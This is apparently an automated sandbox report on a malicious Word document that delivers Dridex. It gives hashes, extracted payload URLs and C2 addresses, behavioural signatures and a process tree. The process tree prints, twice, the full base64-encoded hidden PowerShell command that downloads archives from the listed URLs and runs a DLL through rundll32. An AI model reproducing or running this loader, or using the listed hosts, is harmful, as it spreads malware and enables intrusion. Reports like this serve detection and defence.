Analysis
-
max time kernel
139s -
max time network
140s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-12-2020 10:04
Static task
static1
Behavioral task
behavioral1
Sample
Payment form-976107909.doc
Resource
win7v20201028
General
-
Target
Payment form-976107909.doc
-
Size
125KB
-
MD5
e5bba655925c16e96ca53ac03a5be3e0
-
SHA1
0c0bae0188249370efe950627192f63929d02e64
-
SHA256
c71ee0a48c0b3f9447490e67c8fefa200785ece00e91a8c24036d230ac0c4b91
-
SHA512
2c82fa4900ded1d5022ee0982060328cf3fe7f71800c8bbdd7fd6a3aa1df794a78d5ef66b1964c960ee1b9c9fd7c93a3129efa8330b531fa80fe04f98208df32
Malware Config
Extracted
https://mountainceramic.com/kx8vjddb.rar
http://siemensagent.com/ny2tqv.zip
https://final.makkahkmcc.com/shqay5y.rar
https://bhasinbrothers.com/cdy7qodb.rar
https://test.chongthamsika.com.vn/jl4gs4ar.zip
https://skvflexandoffset.in/igjkrk3.rar
http://weedcompare.co.uk/mkcy8uttq.zip
https://thisismycurrentproject.com/rtftdo.rar
Extracted
dridex
10555
104.131.164.93:443
46.101.90.205:4643
27.254.174.84:4443
92.94.251.127:3786
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3516 3460 cmd.exe -
Processes:
resource yara_rule behavioral2/memory/2204-17-0x0000000002DC0000-0x0000000002DFD000-memory.dmp dridex_ldr -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exerundll32.exeflow pid process 19 2116 powershell.exe 27 2204 rundll32.exe 29 2204 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 2204 rundll32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 644 WINWORD.EXE 644 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2116 powershell.exe 2116 powershell.exe 2116 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2116 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE 644 WINWORD.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exepowershell.exerundll32.exedescription pid process target process PID 3516 wrote to memory of 1168 3516 cmd.exe msg.exe PID 3516 wrote to memory of 1168 3516 cmd.exe msg.exe PID 3516 wrote to memory of 2116 3516 cmd.exe powershell.exe PID 3516 wrote to memory of 2116 3516 cmd.exe powershell.exe PID 2116 wrote to memory of 2300 2116 powershell.exe rundll32.exe PID 2116 wrote to memory of 2300 2116 powershell.exe rundll32.exe PID 2300 wrote to memory of 2204 2300 rundll32.exe rundll32.exe PID 2300 wrote to memory of 2204 2300 rundll32.exe rundll32.exe PID 2300 wrote to memory of 2204 2300 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment form-976107909.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IABTAEUAVAAtAEkAVABlAG0AIABWAEEAUgBpAEEAQgBMAEUAOgBNADMANgBxADkAIAAgACgAWwB0AFkAUABFAF0AKAAiAHsAMQB9AHsAMwB9AHsANQB9AHsANAB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAFQATwBSAFkAJwAsACcAcwBZAFMAdABFACcALAAnAEMAJwAsACcAbQAuAEkAJwAsACcAZQAnACwAJwBPAC4AZABJAFIAJwApACAAIAApACAAIAA7AFMARQBUAC0AVgBhAFIASQBBAEIAbABlACAAKAAiAEQAbQAyACIAKwAiAEkAcgAiACkAIAAoAFsAdABZAHAARQBdACgAIgB7ADUAfQB7ADgAfQB7ADIAfQB7ADYAfQB7ADMAfQB7ADEAfQB7ADcAfQB7ADAAfQB7ADQAfQAiACAALQBGACcATgBUACcALAAnAE8AJwAsACcAZQAnACwAJwBwACcALAAnAE0AQQBOAGEARwBlAFIAJwAsACcAcwBZAFMAVABFACcALAAnAHIAVgBJAGMAZQAnACwAJwBJACcALAAnAG0ALgBuAEUAVAAuAFMAJwApACAAKQAgADsAJABGADIAcgBnADYAXwBtAD0AKAAoACcAVwAnACsAJwA1AGcAaAAwADIAJwApACsAJwBlACcAKQA7ACQAUwBlAG4AbQBoAHIAegA9ACQAUwBrADUAOQA3AHIAMQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgBuADEAaAA1AGYAYwA7ACQATgAzAGQAcQBhAHQAbwA9ACgAJwBKACcAKwAoACcAcQBfAG8AawAnACsAJwB3ACcAKQArACcAOAAnACkAOwAgACgAVgBBAHIAaQBhAEIATABFACAAbQAzADYAUQA5ACAAIAAtAFYAYQBMAHUAZQBvAG4ATABZACkAOgA6ACIAYwBSAEUAYQB0AEUAZABJAGAAUgBFAGAAYwB0AGAAbwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQAnACsAKAAnAFEAMQAnACsAJwA1ACcAKQArACcANwBoAHIANQB7ADAAfQAnACsAKAAnAEIAMAAnACsAJwB3ADQAdAAnACsAJwBjACcAKQArACcAdwB7ADAAJwArACcAfQAnACkALQBGACAAWwBDAGgAYQBSAF0AOQAyACkAKQA7ACQAVgA0AGMAagBpAHoAMQA9ACgAKAAnAEEAJwArACcAYQAwAHMAagAnACkAKwAnAGYAdAAnACkAOwAgACAAKAAgAHYAQQBSAEkAQQBCAGwAZQAgACAAKAAiAGQAbQAyACIAKwAiAGkAcgAiACkAIAAgACkALgBWAGEAbAB1AEUAOgA6ACIAcwBFAGAAQwBVAHIAaQB0AHkAUABgAFIAbwB0AGAATwBjAGAAbwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABUAHUAegBnAHgAegA0AD0AKAAoACcAVwAnACsAJwBnAHUAJwApACsAJwBwAHIAJwArACcAbQBnACcAKQA7ACQAWQBiAGkAMwBmAHEAOQAgAD0AIAAoACcATAAnACsAKAAnAG8AJwArACcAbwBiACcAKwAnAGQANQBvACcAKQArACcANQAnACkAOwAkAEkAcABhAHUANwBwAGkAPQAoACcARwAnACsAJwB4ADEAJwArACgAJwA4ADIAegAnACsAJwBlACcAKQApADsAJABXAG4AYwBmAGsAawB6AD0AKAAoACcASgBjACcAKwAnADYAMgAnACkAKwAnAHMAeQAnACsAJwA5ACcAKQA7ACQASABwAHMAcgB5AHoAbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AFEAMQA1ADcAJwArACcAaAAnACsAJwByACcAKwAnADUAewAwACcAKwAnAH0AQgAnACsAKAAnADAAdwAnACsAJwA0AHQAYwAnACkAKwAnAHcAewAwAH0AJwApACAAIAAtAGYAIABbAEMAaABhAFIAXQA5ADIAKQArACQAWQBiAGkAMwBmAHEAOQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQAVwBlAGsAagA0AHgAXwA9ACgAJwBIACcAKwAnAHQAJwArACgAJwBpADEAJwArACcAcgB6ADEAJwApACkAOwAkAEYAZQBrADgAaABiAHUAPQBOAGUAYAB3AC0AbwBCAGAAagBlAGAAQwBUACAAbgBFAHQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQASAB2AHoAbwBoAGMAMgA9ACgAKAAnAGgAdAAnACsAKAAoACcAdABwAHMAOgBxACcAKwAnAGEAJwArACcAKQAoADYANwApACgAcQBhACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwA2ADcAKQAnACkAKwAoACgAJwAoAG0AJwApACkAKwAnAG8AJwArACgAJwB1AG4AJwArACcAdABhAGkAbgBjACcAKQArACgAJwBlAHIAYQBtACcAKwAnAGkAYwAnACsAJwAuACcAKQArACgAJwBjAG8AbQAnACsAJwBxACcAKQArACgAKAAnAGEAKQAnACsAJwAoADYAJwApACkAKwAoACgAJwA3ACkAKABrAHgAJwArACcAOAB2AGoAJwArACcAZABkACcAKwAnAGIALgAnACkAKQArACgAJwByACcAKwAnAGEAcgBAACcAKwAnAGgAdAB0AHAAOgAnACkAKwAoACgAJwBxACcAKwAnAGEAJwArACcAKQAoADYANwAnACkAKQArACgAKAAnACkAJwArACcAKABxAGEAJwApACkAKwAoACgAJwApACgANgA3ACkAKABzACcAKwAnAGkAZQBtAGUAJwArACcAbgBzAGEAJwArACcAZwAnACsAJwBlACcAKwAnAG4AdAAnACkAKQArACgAKAAnAC4AYwBvAG0AcQBhACcAKwAnACkAJwArACcAKAA2ADcAKQAnACkAKQArACgAKAAnACgAbgB5ACcAKwAnADIAdABxAHYALgB6ACcAKwAnAGkAJwArACcAcABAACcAKQApACsAJwBoAHQAJwArACgAKAAnAHQAcABzADoAcQBhACcAKwAnACkAKAAnACsAJwA2ACcAKQApACsAJwA3ACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwBxACcAKwAnAGEAKQAoADYAJwApACkAKwAoACgAJwA3ACcAKwAnACkAKABmAGkAbgAnACsAJwBhACcAKwAnAGwALgBtACcAKQApACsAKAAnAGEAawAnACsAJwBrAGEAaABrAG0AYwBjAC4AYwAnACsAJwBvACcAKwAnAG0AJwApACsAKAAoACcAcQBhACkAKAAnACsAJwA2ADcAKQAoACcAKwAnAHMAJwApACkAKwAnAGgAcQAnACsAKAAnAGEAJwArACcAeQA1ACcAKwAnAHkAJwArACcALgByAGEAcgBAACcAKQArACgAJwBoACcAKwAnAHQAdABwACcAKwAnAHMAOgAnACkAKwAoACgAJwBxACcAKwAnAGEAKQAnACkAKQArACgAJwAoADYANwAnACsAJwApACgAcQBhACkAJwApACsAKAAoACcAKAA2ACcAKwAnADcAJwApACkAKwAoACgAJwApACgAJwApACkAKwAoACcAYgBoAGEAJwArACcAcwAnACsAJwBpAG4AYgByAG8AdABoACcAKQArACgAJwBlAHIAcwAnACsAJwAuACcAKwAnAGMAbwBtAHEAJwApACsAKAAoACcAYQApACcAKwAnACgAJwArACcANgA3ACkAKABjACcAKQApACsAJwBkAHkAJwArACcANwAnACsAKAAnAHEAbwBkAGIAJwArACcALgByAGEAcgAnACsAJwBAACcAKQArACgAKAAnAGgAdAB0ACcAKwAnAHAAcwA6AHEAJwArACcAYQApACcAKQApACsAJwAoACcAKwAoACgAJwA2ADcAJwArACcAKQAnACkAKQArACgAKAAnACgAJwArACcAcQBhACkAJwArACcAKAA2ADcAJwApACkAKwAnACkAJwArACgAKAAnACgAdAAnACsAJwBlACcAKQApACsAKAAnAHMAdAAuAGMAaABvAG4AJwArACcAZwB0AGgAJwArACcAYQBtAHMAJwApACsAJwBpACcAKwAoACcAawBhAC4AJwArACcAYwBvACcAKQArACgAKAAnAG0ALgAnACsAJwB2AG4AJwArACcAcQBhACkAKAA2ACcAKwAnADcAKQAoACcAKQApACsAJwBqACcAKwAnAGwAJwArACgAJwA0ACcAKwAnAGcAcwA0AGEAcgAnACsAJwAuAHoAJwApACsAKAAnAGkAcABAACcAKwAnAGgAdAB0ACcAKwAnAHAAJwApACsAJwBzADoAJwArACgAKAAnAHEAYQApACgANgAnACsAJwA3ACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAYQAnACsAJwApACcAKQApACsAJwAoACcAKwAoACgAJwA2ADcAKQAoAHMAJwArACcAawAnACsAJwB2AGYAbAAnACsAJwBlAHgAYQBuAGQAbwBmAGYAcwBlAHQALgAnACsAJwBpACcAKQApACsAKAAoACcAbgBxACcAKwAnAGEAJwArACcAKQAoACcAKwAnADYANwApACgAaQBnAGoAJwApACkAKwAnAGsAcgAnACsAKAAoACcAawAnACsAJwAzAC4AcgAnACsAJwBhAHIAQABoACcAKwAnAHQAdABwADoAcQAnACsAJwBhACkAKAAnACkAKQArACgAKAAnADYAJwArACcANwApACgAcQBhACkAJwArACcAKAA2ADcAJwArACcAKQAoACcAKwAnAHcAZQAnACkAKQArACgAJwBlAGQAJwArACcAYwBvAG0AJwApACsAJwBwAGEAJwArACgAJwByACcAKwAnAGUALgAnACkAKwAnAGMAbwAnACsAKAAoACcALgB1ACcAKwAnAGsAcQAnACsAJwBhACkAKAA2ADcAKQAoAG0AawAnACsAJwBjAHkAJwApACkAKwAoACcAOAB1AHQAdAAnACsAJwBxAC4AegAnACsAJwBpACcAKQArACgAKAAnAHAAJwArACcAQAAnACsAJwBoAHQAdABwAHMAJwArACcAOgBxAGEAKQAnACkAKQArACgAJwAoADYAJwArACcANwApACcAKQArACgAKAAnACgAcQBhACcAKwAnACkAKAA2ADcAJwArACcAKQAoAHQAJwArACcAaABpACcAKwAnAHMAaQAnACsAJwBzAG0AJwApACkAKwAoACcAeQBjAHUAcgByACcAKwAnAGUAJwArACcAbgAnACkAKwAnAHQAJwArACcAcAByACcAKwAoACgAJwBvAGoAZQAnACsAJwBjACcAKwAnAHQALgBjAG8AbQAnACsAJwBxAGEAKQAoACcAKQApACsAKAAoACcANgA3ACkAJwArACcAKAAnACsAJwByAHQAZgB0ACcAKQApACsAKAAnAGQAbwAuAHIAYQAnACsAJwByACcAKQApACkALgAiAHIAZQBgAFAATABhAGMAZQAiACgAKAAoACgAKAAnAHEAYQAnACsAJwApACcAKQApACsAKAAnACgANgAnACsAJwA3ACkAJwApACsAJwAoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoACcAKwAnAHcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABHAGMAaQBxAGwAeQAzACAAKwAgACQAUwBlAG4AbQBoAHIAegAgACsAIAAkAFQAZwBoADUAdQByAHAAKQA7ACQAUwB0AGIAdwBvADcAZwA9ACgAJwBKAGwAJwArACgAJwA2ADMAYwAwACcAKwAnAG0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYANQBxADcAbQBtAGMAIABpAG4AIAAkAEgAdgB6AG8AaABjADIAIAB8ACAAUwBPAGAAUgB0AGAALQBgAE8AQgBqAEUAYABjAHQAIAB7AGcARQB0AC0AYABSAGEAbgBgAEQAYABvAE0AfQApAHsAdAByAHkAewAkAEYAZQBrADgAaABiAHUALgAiAGQAbwBXAGAATgBMAGAATwBBAGQAYABGAEkATABFACIAKAAkAFYANQBxADcAbQBtAGMALAAgACQASABwAHMAcgB5AHoAbQApADsAJABKAGYAcwBxAHAAcgA3AD0AKAAoACcASQAnACsAJwBpAHQAdwBxACcAKQArACcAZgBoACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABIAHAAcwByAHkAegBtACkALgAiAGwARQBOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA2ADQAMAAzACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuAGQAbABsADMAMgAuAGUAeAAnACsAJwBlACcAKQAgACQASABwAHMAcgB5AHoAbQAsADAAOwAkAFEAYQAwAHkAZABsAG8APQAoACgAJwBBACcAKwAnAGMAXwA1ACcAKQArACgAJwBhACcAKwAnAGEAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQATgByAHAAXwBfAGcAaQA9ACgAJwBWACcAKwAoACcAawBmAG0AJwArACcAdQAzAGkAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAeQBwADAAbwBiAGoAPQAoACcAQwB1ACcAKwAoACcAcABvADcAJwArACcAcABtACcAKQApAA==1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -w hidden -ENCOD IABTAEUAVAAtAEkAVABlAG0AIABWAEEAUgBpAEEAQgBMAEUAOgBNADMANgBxADkAIAAgACgAWwB0AFkAUABFAF0AKAAiAHsAMQB9AHsAMwB9AHsANQB9AHsANAB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAFQATwBSAFkAJwAsACcAcwBZAFMAdABFACcALAAnAEMAJwAsACcAbQAuAEkAJwAsACcAZQAnACwAJwBPAC4AZABJAFIAJwApACAAIAApACAAIAA7AFMARQBUAC0AVgBhAFIASQBBAEIAbABlACAAKAAiAEQAbQAyACIAKwAiAEkAcgAiACkAIAAoAFsAdABZAHAARQBdACgAIgB7ADUAfQB7ADgAfQB7ADIAfQB7ADYAfQB7ADMAfQB7ADEAfQB7ADcAfQB7ADAAfQB7ADQAfQAiACAALQBGACcATgBUACcALAAnAE8AJwAsACcAZQAnACwAJwBwACcALAAnAE0AQQBOAGEARwBlAFIAJwAsACcAcwBZAFMAVABFACcALAAnAHIAVgBJAGMAZQAnACwAJwBJACcALAAnAG0ALgBuAEUAVAAuAFMAJwApACAAKQAgADsAJABGADIAcgBnADYAXwBtAD0AKAAoACcAVwAnACsAJwA1AGcAaAAwADIAJwApACsAJwBlACcAKQA7ACQAUwBlAG4AbQBoAHIAegA9ACQAUwBrADUAOQA3AHIAMQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgBuADEAaAA1AGYAYwA7ACQATgAzAGQAcQBhAHQAbwA9ACgAJwBKACcAKwAoACcAcQBfAG8AawAnACsAJwB3ACcAKQArACcAOAAnACkAOwAgACgAVgBBAHIAaQBhAEIATABFACAAbQAzADYAUQA5ACAAIAAtAFYAYQBMAHUAZQBvAG4ATABZACkAOgA6ACIAYwBSAEUAYQB0AEUAZABJAGAAUgBFAGAAYwB0AGAAbwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQAnACsAKAAnAFEAMQAnACsAJwA1ACcAKQArACcANwBoAHIANQB7ADAAfQAnACsAKAAnAEIAMAAnACsAJwB3ADQAdAAnACsAJwBjACcAKQArACcAdwB7ADAAJwArACcAfQAnACkALQBGACAAWwBDAGgAYQBSAF0AOQAyACkAKQA7ACQAVgA0AGMAagBpAHoAMQA9ACgAKAAnAEEAJwArACcAYQAwAHMAagAnACkAKwAnAGYAdAAnACkAOwAgACAAKAAgAHYAQQBSAEkAQQBCAGwAZQAgACAAKAAiAGQAbQAyACIAKwAiAGkAcgAiACkAIAAgACkALgBWAGEAbAB1AEUAOgA6ACIAcwBFAGAAQwBVAHIAaQB0AHkAUABgAFIAbwB0AGAATwBjAGAAbwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABUAHUAegBnAHgAegA0AD0AKAAoACcAVwAnACsAJwBnAHUAJwApACsAJwBwAHIAJwArACcAbQBnACcAKQA7ACQAWQBiAGkAMwBmAHEAOQAgAD0AIAAoACcATAAnACsAKAAnAG8AJwArACcAbwBiACcAKwAnAGQANQBvACcAKQArACcANQAnACkAOwAkAEkAcABhAHUANwBwAGkAPQAoACcARwAnACsAJwB4ADEAJwArACgAJwA4ADIAegAnACsAJwBlACcAKQApADsAJABXAG4AYwBmAGsAawB6AD0AKAAoACcASgBjACcAKwAnADYAMgAnACkAKwAnAHMAeQAnACsAJwA5ACcAKQA7ACQASABwAHMAcgB5AHoAbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AFEAMQA1ADcAJwArACcAaAAnACsAJwByACcAKwAnADUAewAwACcAKwAnAH0AQgAnACsAKAAnADAAdwAnACsAJwA0AHQAYwAnACkAKwAnAHcAewAwAH0AJwApACAAIAAtAGYAIABbAEMAaABhAFIAXQA5ADIAKQArACQAWQBiAGkAMwBmAHEAOQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQAVwBlAGsAagA0AHgAXwA9ACgAJwBIACcAKwAnAHQAJwArACgAJwBpADEAJwArACcAcgB6ADEAJwApACkAOwAkAEYAZQBrADgAaABiAHUAPQBOAGUAYAB3AC0AbwBCAGAAagBlAGAAQwBUACAAbgBFAHQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQASAB2AHoAbwBoAGMAMgA9ACgAKAAnAGgAdAAnACsAKAAoACcAdABwAHMAOgBxACcAKwAnAGEAJwArACcAKQAoADYANwApACgAcQBhACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwA2ADcAKQAnACkAKwAoACgAJwAoAG0AJwApACkAKwAnAG8AJwArACgAJwB1AG4AJwArACcAdABhAGkAbgBjACcAKQArACgAJwBlAHIAYQBtACcAKwAnAGkAYwAnACsAJwAuACcAKQArACgAJwBjAG8AbQAnACsAJwBxACcAKQArACgAKAAnAGEAKQAnACsAJwAoADYAJwApACkAKwAoACgAJwA3ACkAKABrAHgAJwArACcAOAB2AGoAJwArACcAZABkACcAKwAnAGIALgAnACkAKQArACgAJwByACcAKwAnAGEAcgBAACcAKwAnAGgAdAB0AHAAOgAnACkAKwAoACgAJwBxACcAKwAnAGEAJwArACcAKQAoADYANwAnACkAKQArACgAKAAnACkAJwArACcAKABxAGEAJwApACkAKwAoACgAJwApACgANgA3ACkAKABzACcAKwAnAGkAZQBtAGUAJwArACcAbgBzAGEAJwArACcAZwAnACsAJwBlACcAKwAnAG4AdAAnACkAKQArACgAKAAnAC4AYwBvAG0AcQBhACcAKwAnACkAJwArACcAKAA2ADcAKQAnACkAKQArACgAKAAnACgAbgB5ACcAKwAnADIAdABxAHYALgB6ACcAKwAnAGkAJwArACcAcABAACcAKQApACsAJwBoAHQAJwArACgAKAAnAHQAcABzADoAcQBhACcAKwAnACkAKAAnACsAJwA2ACcAKQApACsAJwA3ACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwBxACcAKwAnAGEAKQAoADYAJwApACkAKwAoACgAJwA3ACcAKwAnACkAKABmAGkAbgAnACsAJwBhACcAKwAnAGwALgBtACcAKQApACsAKAAnAGEAawAnACsAJwBrAGEAaABrAG0AYwBjAC4AYwAnACsAJwBvACcAKwAnAG0AJwApACsAKAAoACcAcQBhACkAKAAnACsAJwA2ADcAKQAoACcAKwAnAHMAJwApACkAKwAnAGgAcQAnACsAKAAnAGEAJwArACcAeQA1ACcAKwAnAHkAJwArACcALgByAGEAcgBAACcAKQArACgAJwBoACcAKwAnAHQAdABwACcAKwAnAHMAOgAnACkAKwAoACgAJwBxACcAKwAnAGEAKQAnACkAKQArACgAJwAoADYANwAnACsAJwApACgAcQBhACkAJwApACsAKAAoACcAKAA2ACcAKwAnADcAJwApACkAKwAoACgAJwApACgAJwApACkAKwAoACcAYgBoAGEAJwArACcAcwAnACsAJwBpAG4AYgByAG8AdABoACcAKQArACgAJwBlAHIAcwAnACsAJwAuACcAKwAnAGMAbwBtAHEAJwApACsAKAAoACcAYQApACcAKwAnACgAJwArACcANgA3ACkAKABjACcAKQApACsAJwBkAHkAJwArACcANwAnACsAKAAnAHEAbwBkAGIAJwArACcALgByAGEAcgAnACsAJwBAACcAKQArACgAKAAnAGgAdAB0ACcAKwAnAHAAcwA6AHEAJwArACcAYQApACcAKQApACsAJwAoACcAKwAoACgAJwA2ADcAJwArACcAKQAnACkAKQArACgAKAAnACgAJwArACcAcQBhACkAJwArACcAKAA2ADcAJwApACkAKwAnACkAJwArACgAKAAnACgAdAAnACsAJwBlACcAKQApACsAKAAnAHMAdAAuAGMAaABvAG4AJwArACcAZwB0AGgAJwArACcAYQBtAHMAJwApACsAJwBpACcAKwAoACcAawBhAC4AJwArACcAYwBvACcAKQArACgAKAAnAG0ALgAnACsAJwB2AG4AJwArACcAcQBhACkAKAA2ACcAKwAnADcAKQAoACcAKQApACsAJwBqACcAKwAnAGwAJwArACgAJwA0ACcAKwAnAGcAcwA0AGEAcgAnACsAJwAuAHoAJwApACsAKAAnAGkAcABAACcAKwAnAGgAdAB0ACcAKwAnAHAAJwApACsAJwBzADoAJwArACgAKAAnAHEAYQApACgANgAnACsAJwA3ACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAYQAnACsAJwApACcAKQApACsAJwAoACcAKwAoACgAJwA2ADcAKQAoAHMAJwArACcAawAnACsAJwB2AGYAbAAnACsAJwBlAHgAYQBuAGQAbwBmAGYAcwBlAHQALgAnACsAJwBpACcAKQApACsAKAAoACcAbgBxACcAKwAnAGEAJwArACcAKQAoACcAKwAnADYANwApACgAaQBnAGoAJwApACkAKwAnAGsAcgAnACsAKAAoACcAawAnACsAJwAzAC4AcgAnACsAJwBhAHIAQABoACcAKwAnAHQAdABwADoAcQAnACsAJwBhACkAKAAnACkAKQArACgAKAAnADYAJwArACcANwApACgAcQBhACkAJwArACcAKAA2ADcAJwArACcAKQAoACcAKwAnAHcAZQAnACkAKQArACgAJwBlAGQAJwArACcAYwBvAG0AJwApACsAJwBwAGEAJwArACgAJwByACcAKwAnAGUALgAnACkAKwAnAGMAbwAnACsAKAAoACcALgB1ACcAKwAnAGsAcQAnACsAJwBhACkAKAA2ADcAKQAoAG0AawAnACsAJwBjAHkAJwApACkAKwAoACcAOAB1AHQAdAAnACsAJwBxAC4AegAnACsAJwBpACcAKQArACgAKAAnAHAAJwArACcAQAAnACsAJwBoAHQAdABwAHMAJwArACcAOgBxAGEAKQAnACkAKQArACgAJwAoADYAJwArACcANwApACcAKQArACgAKAAnACgAcQBhACcAKwAnACkAKAA2ADcAJwArACcAKQAoAHQAJwArACcAaABpACcAKwAnAHMAaQAnACsAJwBzAG0AJwApACkAKwAoACcAeQBjAHUAcgByACcAKwAnAGUAJwArACcAbgAnACkAKwAnAHQAJwArACcAcAByACcAKwAoACgAJwBvAGoAZQAnACsAJwBjACcAKwAnAHQALgBjAG8AbQAnACsAJwBxAGEAKQAoACcAKQApACsAKAAoACcANgA3ACkAJwArACcAKAAnACsAJwByAHQAZgB0ACcAKQApACsAKAAnAGQAbwAuAHIAYQAnACsAJwByACcAKQApACkALgAiAHIAZQBgAFAATABhAGMAZQAiACgAKAAoACgAKAAnAHEAYQAnACsAJwApACcAKQApACsAKAAnACgANgAnACsAJwA3ACkAJwApACsAJwAoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoACcAKwAnAHcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABHAGMAaQBxAGwAeQAzACAAKwAgACQAUwBlAG4AbQBoAHIAegAgACsAIAAkAFQAZwBoADUAdQByAHAAKQA7ACQAUwB0AGIAdwBvADcAZwA9ACgAJwBKAGwAJwArACgAJwA2ADMAYwAwACcAKwAnAG0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYANQBxADcAbQBtAGMAIABpAG4AIAAkAEgAdgB6AG8AaABjADIAIAB8ACAAUwBPAGAAUgB0AGAALQBgAE8AQgBqAEUAYABjAHQAIAB7AGcARQB0AC0AYABSAGEAbgBgAEQAYABvAE0AfQApAHsAdAByAHkAewAkAEYAZQBrADgAaABiAHUALgAiAGQAbwBXAGAATgBMAGAATwBBAGQAYABGAEkATABFACIAKAAkAFYANQBxADcAbQBtAGMALAAgACQASABwAHMAcgB5AHoAbQApADsAJABKAGYAcwBxAHAAcgA3AD0AKAAoACcASQAnACsAJwBpAHQAdwBxACcAKQArACcAZgBoACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABIAHAAcwByAHkAegBtACkALgAiAGwARQBOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA2ADQAMAAzACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuAGQAbABsADMAMgAuAGUAeAAnACsAJwBlACcAKQAgACQASABwAHMAcgB5AHoAbQAsADAAOwAkAFEAYQAwAHkAZABsAG8APQAoACgAJwBBACcAKwAnAGMAXwA1ACcAKQArACgAJwBhACcAKwAnAGEAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQATgByAHAAXwBfAGcAaQA9ACgAJwBWACcAKwAoACcAawBmAG0AJwArACcAdQAzAGkAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAeQBwADAAbwBiAGoAPQAoACcAQwB1ACcAKwAoACcAcABvADcAJwArACcAcABtACcAKQApAA==2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
